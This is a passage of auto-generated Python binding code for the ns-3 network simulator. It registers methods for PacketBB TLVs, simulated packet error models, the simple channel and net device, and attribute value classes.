'ns3::Ptr< ns3::PbbTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvPopBack() [member function]
cls.add_method('TlvPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvPopFront() [member function]
cls.add_method('TlvPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvPushBack(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('TlvPushBack',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbPacket::TlvPushFront(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('TlvPushFront',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): int ns3::PbbPacket::TlvSize() const [member function]
cls.add_method('TlvSize',
'int',
[],
is_const=True)
return
def register_Ns3PbbTlv_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbTlv::PbbTlv(ns3::PbbTlv const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbTlv const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbTlv::PbbTlv() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): void ns3::PbbTlv::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): uint32_t ns3::PbbTlv::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbTlv::GetType() const [member function]
cls.add_method('GetType',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbTlv::GetTypeExt() const [member function]
cls.add_method('GetTypeExt',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Buffer ns3::PbbTlv::GetValue() const [member function]
cls.add_method('GetValue',
'ns3::Buffer',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbTlv::HasTypeExt() const [member function]
cls.add_method('HasTypeExt',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbTlv::HasValue() const [member function]
cls.add_method('HasValue',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlv::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlv::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlv::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlv::SetType(uint8_t type) [member function]
cls.add_method('SetType',
'void',
[param('uint8_t', 'type')])
## packetbb.h (module 'network'): void ns3::PbbTlv::SetTypeExt(uint8_t type) [member function]
cls.add_method('SetTypeExt',
'void',
[param('uint8_t', 'type')])
## packetbb.h (module 'network'): void ns3::PbbTlv::SetValue(ns3::Buffer start) [member function]
cls.add_method('SetValue',
'void',
[param('ns3::Buffer', 'start')])
## packetbb.h (module 'network'): void ns3::PbbTlv::SetValue(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('SetValue',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packetbb.h (module 'network'): uint8_t ns3::PbbTlv::GetIndexStart() const [member function]
cls.add_method('GetIndexStart',
'uint8_t',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): uint8_t ns3::PbbTlv::GetIndexStop() const [member function]
cls.add_method('GetIndexStop',
'uint8_t',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): bool ns3::PbbTlv::HasIndexStart() const [member function]
cls.add_method('HasIndexStart',
'bool',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): bool ns3::PbbTlv::HasIndexStop() const [member function]
cls.add_method('HasIndexStop',
'bool',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): bool ns3::PbbTlv::IsMultivalue() const [member function]
cls.add_method('IsMultivalue',
'bool',
[],
is_const=True, visibility='protected')
## packetbb.h (module 'network'): void ns3::PbbTlv::SetIndexStart(uint8_t index) [member function]
cls.add_method('SetIndexStart',
'void',
[param('uint8_t', 'index')],
visibility='protected')
## packetbb.h (module 'network'): void ns3::PbbTlv::SetIndexStop(uint8_t index) [member function]
cls.add_method('SetIndexStop',
'void',
[param('uint8_t', 'index')],
visibility='protected')
## packetbb.h (module 'network'): void ns3::PbbTlv::SetMultivalue(bool isMultivalue) [member function]
cls.add_method('SetMultivalue',
'void',
[param('bool', 'isMultivalue')],
visibility='protected')
return
def register_Ns3RandomVariableChecker_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::RandomVariableChecker::RandomVariableChecker() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariableChecker::RandomVariableChecker(ns3::RandomVariableChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomVariableChecker const &', 'arg0')])
return
def register_Ns3RandomVariableValue_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue(ns3::RandomVariableValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomVariableValue const &', 'arg0')])
## random-variable.h (module 'core'): ns3::RandomVariableValue::RandomVariableValue(ns3::RandomVariable const & value) [constructor]
cls.add_constructor([param('ns3::RandomVariable const &', 'value')])
## random-variable.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::RandomVariableValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## random-variable.h (module 'core'): bool ns3::RandomVariableValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## random-variable.h (module 'core'): ns3::RandomVariable ns3::RandomVariableValue::Get() const [member function]
cls.add_method('Get',
'ns3::RandomVariable',
[],
is_const=True)
## random-variable.h (module 'core'): std::string ns3::RandomVariableValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## random-variable.h (module 'core'): void ns3::RandomVariableValue::Set(ns3::RandomVariable const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::RandomVariable const &', 'value')])
return
def register_Ns3RateErrorModel_methods(root_module, cls):
## error-model.h (module 'network'): ns3::RateErrorModel::RateErrorModel(ns3::RateErrorModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RateErrorModel const &', 'arg0')])
## error-model.h (module 'network'): ns3::RateErrorModel::RateErrorModel() [constructor]
cls.add_constructor([])
## error-model.h (module 'network'): double ns3::RateErrorModel::GetRate() const [member function]
cls.add_method('GetRate',
'double',
[],
is_const=True)
## error-model.h (module 'network'): static ns3::TypeId ns3::RateErrorModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## error-model.h (module 'network'): ns3::RateErrorModel::ErrorUnit ns3::RateErrorModel::GetUnit() const [member function]
cls.add_method('GetUnit',
'ns3::RateErrorModel::ErrorUnit',
[],
is_const=True)
## error-model.h (module 'network'): void ns3::RateErrorModel::SetRandomVariable(ns3::RandomVariable const & ranvar) [member function]
cls.add_method('SetRandomVariable',
'void',
[param('ns3::RandomVariable const &', 'ranvar')])
## error-model.h (module 'network'): void ns3::RateErrorModel::SetRate(double rate) [member function]
cls.add_method('SetRate',
'void',
[param('double', 'rate')])
## error-model.h (module 'network'): void ns3::RateErrorModel::SetUnit(ns3::RateErrorModel::ErrorUnit error_unit) [member function]
cls.add_method('SetUnit',
'void',
[param('ns3::RateErrorModel::ErrorUnit', 'error_unit')])
## error-model.h (module 'network'): bool ns3::RateErrorModel::DoCorrupt(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): bool ns3::RateErrorModel::DoCorruptBit(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorruptBit',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): bool ns3::RateErrorModel::DoCorruptByte(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorruptByte',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): bool ns3::RateErrorModel::DoCorruptPkt(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorruptPkt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): void ns3::RateErrorModel::DoReset() [member function]
cls.add_method('DoReset',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3ReceiveListErrorModel_methods(root_module, cls):
## error-model.h (module 'network'): ns3::ReceiveListErrorModel::ReceiveListErrorModel(ns3::ReceiveListErrorModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ReceiveListErrorModel const &', 'arg0')])
## error-model.h (module 'network'): ns3::ReceiveListErrorModel::ReceiveListErrorModel() [constructor]
cls.add_constructor([])
## error-model.h (module 'network'): std::list<unsigned int, std::allocator<unsigned int> > ns3::ReceiveListErrorModel::GetList() const [member function]
cls.add_method('GetList',
'std::list< unsigned int >',
[],
is_const=True)
## error-model.h (module 'network'): static ns3::TypeId ns3::ReceiveListErrorModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## error-model.h (module 'network'): void ns3::ReceiveListErrorModel::SetList(std::list<unsigned int, std::allocator<unsigned int> > const & packetlist) [member function]
cls.add_method('SetList',
'void',
[param('std::list< unsigned int > const &', 'packetlist')])
## error-model.h (module 'network'): bool ns3::ReceiveListErrorModel::DoCorrupt(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## error-model.h (module 'network'): void ns3::ReceiveListErrorModel::DoReset() [member function]
cls.add_method('DoReset',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3SimpleChannel_methods(root_module, cls):
## simple-channel.h (module 'network'): ns3::SimpleChannel::SimpleChannel(ns3::SimpleChannel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SimpleChannel const &', 'arg0')])
## simple-channel.h (module 'network'): ns3::SimpleChannel::SimpleChannel() [constructor]
cls.add_constructor([])
## simple-channel.h (module 'network'): void ns3::SimpleChannel::Add(ns3::Ptr<ns3::SimpleNetDevice> device) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::SimpleNetDevice >', 'device')])
## simple-channel.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::SimpleChannel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## simple-channel.h (module 'network'): uint32_t ns3::SimpleChannel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True, is_virtual=True)
## simple-channel.h (module 'network'): static ns3::TypeId ns3::SimpleChannel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## simple-channel.h (module 'network'): void ns3::SimpleChannel::Send(ns3::Ptr<ns3::Packet> p, uint16_t protocol, ns3::Mac48Address to, ns3::Mac48Address from, ns3::Ptr<ns3::SimpleNetDevice> sender) [member function]
cls.add_method('Send',
'void',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint16_t', 'protocol'), param('ns3::Mac48Address', 'to'), param('ns3::Mac48Address', 'from'), param('ns3::Ptr< ns3::SimpleNetDevice >', 'sender')])
return
def register_Ns3SimpleNetDevice_methods(root_module, cls):
## simple-net-device.h (module 'network'): ns3::SimpleNetDevice::SimpleNetDevice(ns3::SimpleNetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SimpleNetDevice const &', 'arg0')])
## simple-net-device.h (module 'network'): ns3::SimpleNetDevice::SimpleNetDevice() [constructor]
cls.add_constructor([])
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::AddLinkChangeCallback(ns3::Callback<void,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Address ns3::SimpleNetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Address ns3::SimpleNetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::SimpleNetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): uint32_t ns3::SimpleNetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): uint16_t ns3::SimpleNetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Address ns3::SimpleNetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Address ns3::SimpleNetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::SimpleNetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): static ns3::TypeId ns3::SimpleNetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::Receive(ns3::Ptr<ns3::Packet> packet, uint16_t protocol, ns3::Mac48Address to, ns3::Mac48Address from) [member function]
cls.add_method('Receive',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('uint16_t', 'protocol'), param('ns3::Mac48Address', 'to'), param('ns3::Mac48Address', 'from')])
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetChannel(ns3::Ptr<ns3::SimpleChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::SimpleChannel >', 'channel')])
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_virtual=True)
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetPromiscReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::SetReceiveErrorModel(ns3::Ptr<ns3::ErrorModel> em) [member function]
cls.add_method('SetReceiveErrorModel',
'void',
[param('ns3::Ptr< ns3::ErrorModel >', 'em')])
## simple-net-device.h (module 'network'): bool ns3::SimpleNetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_const=True, is_virtual=True)
## simple-net-device.h (module 'network'): void ns3::SimpleNetDevice::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3TimeChecker_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker(ns3::TimeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeChecker const &', 'arg0')])
return
def register_Ns3TimeValue_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
cls.add_constructor([param('ns3::Time const &', 'value')])
## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
cls.add_method('Get',
'ns3::Time',
[],
is_const=True)
## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Time const &', 'value')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3AddressChecker_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')])
return
def register_Ns3AddressValue_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressValue const &', 'arg0')])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor]
cls.add_constructor([param('ns3::Address const &', 'value')])
## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Address',
[],
is_const=True)
## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Address const &', 'value')])
return
def register_Ns3PbbAddressTlv_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbAddressTlv::PbbAddressTlv() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::PbbAddressTlv::PbbAddressTlv(ns3::PbbAddressTlv const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressTlv const &', 'arg0')])
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressTlv::GetIndexStart() const [member function]
cls.add_method('GetIndexStart',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressTlv::GetIndexStop() const [member function]
cls.add_method('GetIndexStop',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbAddressTlv::HasIndexStart() const [member function]
cls.add_method('HasIndexStart',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbAddressTlv::HasIndexStop() const [member function]
cls.add_method('HasIndexStop',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): bool ns3::PbbAddressTlv::IsMultivalue() const [member function]
cls.add_method('IsMultivalue',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressTlv::SetIndexStart(uint8_t index) [member function]
cls.add_method('SetIndexStart',
'void',
[param('uint8_t', 'index')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlv::SetIndexStop(uint8_t index) [member function]
cls.add_method('SetIndexStop',
'void',
[param('uint8_t', 'index')])
## packetbb.h (module 'network'): void ns3::PbbAddressTlv::SetMultivalue(bool isMultivalue) [member function]
cls.add_method('SetMultivalue',
'void',
[param('bool', 'isMultivalue')])
return
def register_functions(root_module):
module = root_module
## address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeAddressChecker() [free function]
module.add_function('MakeAddressChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## data-rate.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeDataRateChecker() [free function]
module.add_function('MakeDataRateChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## ipv4-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeIpv4AddressChecker() [free function]
module.add_function('MakeIpv4AddressChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## ipv4-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeIpv4MaskChecker() [free function]
module.add_function('MakeIpv4MaskChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## ipv6-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeIpv6AddressChecker() [free function]
module.add_function('MakeIpv6AddressChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## ipv6-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeIpv6PrefixChecker() [free function]
module.add_function('MakeIpv6PrefixChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## mac48-address.h (module 'network'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeMac48AddressChecker() [free function]
module.add_function('MakeMac48AddressChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
## address-utils.h (module 'network'): extern void ns3::ReadFrom(ns3::Buffer::Iterator & i, ns3::Address & ad, uint32_t len) [free function]
module.add_function('ReadFrom',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Address &', 'ad'), param('uint32_t', 'len')])
## address-utils.h (module 'network'): extern void ns3::ReadFrom(ns3::Buffer::Iterator & i, ns3::Ipv4Address & ad) [free function]
module.add_function('ReadFrom',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Ipv4Address &', 'ad')])
## address-utils.h (module 'network'): extern void ns3::ReadFrom(ns3::Buffer::Iterator & i, ns3::Ipv6Address & ad) [free function]
module.add_function('ReadFrom',
'void',
[param('ns3::Buffer::Iterator &', 'i'), param('ns3::Ipv6Address &', 'ad')])
## address-utils.h (module 'network'): extern void ns3::ReadFrom(ns3::Buffer::Iterator & i, ns3::Mac48Address & ad) [free function]
module.add_function('ReadFrom',
'void',
